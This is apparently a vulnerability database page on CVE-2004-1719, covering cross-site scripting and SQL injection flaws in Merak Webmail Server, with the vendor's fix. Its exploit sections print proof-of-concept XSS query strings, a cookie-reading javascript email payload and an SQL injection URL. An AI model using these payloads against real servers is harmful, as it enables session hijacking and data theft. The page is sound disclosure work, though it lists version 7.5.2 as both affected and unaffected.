CVE-2004-1719
CVSS4.3
发布时间 :2004-08-17 00:00:00
修订时间 :2016-10-17 22:59:47
NMCOES    

[原文]Multiple cross-site scripting (XSS) vulnerabilities in Merak Webmail Server 5.2.7 allow remote attackers to inject arbitrary web script or HTML via the (1) category, (2) cserver, (3) ext, (4) global, (5) showgroups, (6) or showlite parameters to address.html, or the (7) spage or (8) autoresponder parameters to settings.html, the (9) folder parameter to readmail.html, or the (10) attachmentpage_text_error parameter to attachment.html, (11) folder, (12) ct, or (13) cv parameters to calendar.html, (14) an <img> tag, or (15) the subject of an e-mail message.


[CNNVD]多个Merak Mail Server Webmail 漏洞(CNNVD-200408-138)

        Merak Webmail Server 5.2.7版本中存在多个跨站脚本(XSS)漏洞。远程攻击者可以通过(1) category, (2) cserver, (3) ext, (4) global, (5) showgroups, (6) address.html中的showlite参数,或者(7) spage 或者 (8)settings.html中的autoresponder参数,(9)readmail.html中的folder参数,或者(10) attachment.html中的attachmentpage_text_error参数 (11) folder, (12) ct, 或者 (13)calendar.html中的 cv 参数, (14) 标签, 或者(15)电子邮件主题注入任意web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1719
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1719
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-138
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109279057326044&w=2
(UNKNOWN)  BUGTRAQ  20040817 Vulnerabilities in Merak Webmail Server
http://packetstormsecurity.nl/0408-exploits/merak527.txt
(VENDOR_ADVISORY)  MISC  http://packetstormsecurity.nl/0408-exploits/merak527.txt
http://securitytracker.com/id?1010969
(UNKNOWN)  SECTRACK  1010969
http://www.securityfocus.com/bid/10966
(VENDOR_ADVISORY)  BID  10966
http://xforce.iss.net/xforce/xfdb/17024
(VENDOR_ADVISORY)  XF  merak-xss(17024)

- 漏洞信息

多个Merak Mail Server Webmail 漏洞
中危 跨站脚本
2004-08-17 00:00:00 2006-04-07 00:00:00
远程  
        Merak Webmail Server 5.2.7版本中存在多个跨站脚本(XSS)漏洞。远程攻击者可以通过(1) category, (2) cserver, (3) ext, (4) global, (5) showgroups, (6) address.html中的showlite参数,或者(7) spage 或者 (8)settings.html中的autoresponder参数,(9)readmail.html中的folder参数,或者(10) attachment.html中的attachmentpage_text_error参数 (11) folder, (12) ct, 或者 (13)calendar.html中的 cv 参数, (14) 标签, 或者(15)电子邮件主题注入任意web脚本或HTML。

- 公告与补丁

        The vendor has released version 7.5.2 of Merak Mail Server. This includes an updated version of Merak Webmail Server that reportedly fixes these vulnerabilities.
        Merak Mail Server 7.4.5
        

- 漏洞信息 (24377)

Merak Mail Server 7.4.5 address.html Multiple Parameter XSS (EDBID:24377)
php webapps
2004-07-17 Verified
0 Criolabs
N/A [点击下载]
source: http://www.securityfocus.com/bid/10966/info

The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.

The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability

These vulnerabilities are reported to exist in versions prior to 7.5.2.

/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category="><script>alert()</script>&cserver=&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=">[XSS]&ext=
/address.html?id=[id]&sort=name&selectsort=&global=&showgroups=&showlite=&category=&cserver=&ext=">[XSS]
/address.html?id=[id]&sort=&selectsort=&global=">[XSS]&showgroups=&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=">[XSS]&showlite=&category=&cserver=&ext=
/address.html?id=[id]&sort=&selectsort=&global=&showgroups=&showlite=">[XSS]&category=&cserver=&ext=		

- 漏洞信息 (24378)

Merak Mail Server 7.4.5 settings.html Multiple Parameter XSS (EDBID:24378)
php webapps
2004-07-17 Verified
0 Criolabs
N/A [点击下载]
source: http://www.securityfocus.com/bid/10966/info
 
The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.
 
The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability
 
These vulnerabilities are reported to exist in versions prior to 7.5.2.

/settings.html?autoresponder=1&id=[id]&spage=">[XSS]
/settings.html?autoresponder=">[XSS]&id=[id]&spage=0
		

- 漏洞信息 (24379)

Merak Mail Server 7.4.5 attachment.html attachmentpage_text_error Parameter XSS (EDBID:24379)
php webapps
2004-07-17 Verified
0 Criolabs
N/A [点击下载]
source: http://www.securityfocus.com/bid/10966/info
  
The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.
  
The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability
  
These vulnerabilities are reported to exist in versions prior to 7.5.2.

/attachment.html?attachmentpage_text_error=">[XSS]		

- 漏洞信息 (24380)

Merak Mail Server 7.4.5 HTML Message Body XSS (EDBID:24380)
php webapps
2004-07-17 Verified
0 Criolabs
N/A [点击下载]
source: http://www.securityfocus.com/bid/10966/info
   
The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.
   
The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability
   
These vulnerabilities are reported to exist in versions prior to 7.5.2.

<IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0><IFRAME src="http://www.google.com"></body> </html> </IFRAME>		

- 漏洞信息

9037
IceWarp WebMail address.html Multiple Parameter XSS
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Merak Mail Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to the address.html script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

- 时间线

2004-08-17 2004-08-04
2004-08-17 Unknow

- 解决方案

Upgrade to version 7.5.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Merak Mail Server Webmail Multiple Vulnerabilities
Design Error 10966
Yes No
2004-08-17 12:00:00 2009-07-12 06:16:00
Criolabs <security@criolabs.net> disclosed these vulnerabilities.

- 受影响的程序版本

Merak Webmail Server 5.2.7
Merak Mail Server 7.4.5
Merak Mail Server 7.5.2

- 不受影响的程序版本

Merak Mail Server 7.5.2

- 漏洞讨论

The webmail package embedded in Merak Mail Server is reported prone to multiple vulnerabilities.

The vulnerabilities reported are:
- Multiple cross-site scripting vulnerabilities
- An HTML injection vulnerability
- A PHP source code disclosure vulnerability
- An SQL injection vulnerability

These vulnerabilities are reported to exist in versions prior to 7.5.2.

- 漏洞利用

An exploit is not required. Examples were provided:

Cross-site scripting examples:
/address.html?id=[id]&amp;sort=name&amp;selectsort=&amp;global=&amp;showgroups=&amp;showlite=&amp;category="&gt;&lt;script&gt;alert()&lt;/script&gt;&amp;cserver=&amp;ext=
/address.html?id=[id]&amp;sort=name&amp;selectsort=&amp;global=&amp;showgroups=&amp;showlite=&amp;category=&amp;cserver="&gt;[XSS]&amp;ext=
/address.html?id=[id]&amp;sort=name&amp;selectsort=&amp;global=&amp;showgroups=&amp;showlite=&amp;category=&amp;cserver=&amp;ext="&gt;[XSS]
/address.html?id=[id]&amp;sort=&amp;selectsort=&amp;global="&gt;[XSS]&amp;showgroups=&amp;showlite=&amp;category=&amp;cserver=&amp;ext=
/address.html?id=[id]&amp;sort=&amp;selectsort=&amp;global=&amp;showgroups="&gt;[XSS]&amp;showlite=&amp;category=&amp;cserver=&amp;ext=
/address.html?id=[id]&amp;sort=&amp;selectsort=&amp;global=&amp;showgroups=&amp;showlite="&gt;[XSS]&amp;category=&amp;cserver=&amp;ext=
/settings.html?autoresponder=1&amp;id=[id]&amp;spage="&gt;[XSS]
/settings.html?autoresponder="&gt;[XSS]&amp;id=[id]&amp;spage=0
/readmail.html?id=[id]&amp;folder="&gt;[XSS]
/attachment.html?attachmentpage_text_error="&gt;[XSS]
/calendar.html?id=1&amp;schedule=admin%40merakdemo.com&amp;cv=n&amp;folder=&lt;script&gt;alert()&lt;/script&gt;
/calendar.html?id=1&amp;schedule=koko%40merakdemo.com&amp;sf=addevent&amp;cv=d&amp;ct="&gt;[XSS]
/calendar.html?id=[id]&amp;cv="&gt;[XSS]&amp;ct=[ct]&amp;sf=addevent&amp;ESdhour=8

HTML injection example, email body contents:
&lt;IMG alt="" hspace=0 src="javascript:alert(document.cookie)" align=baseline border=0&gt;&lt;IFRAME src="http://www.google.com"&gt;&lt;/body&gt; &lt;/html&gt; &lt;/IFRAME&gt;

SQL injection example:
/calendar.html?id=1'&amp;schedule=[SQL]

- 解决方案

The vendor has released version 7.5.2 of Merak Mail Server. This includes an updated version of Merak Webmail Server that reportedly fixes these vulnerabilities.


Merak Mail Server 7.4.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站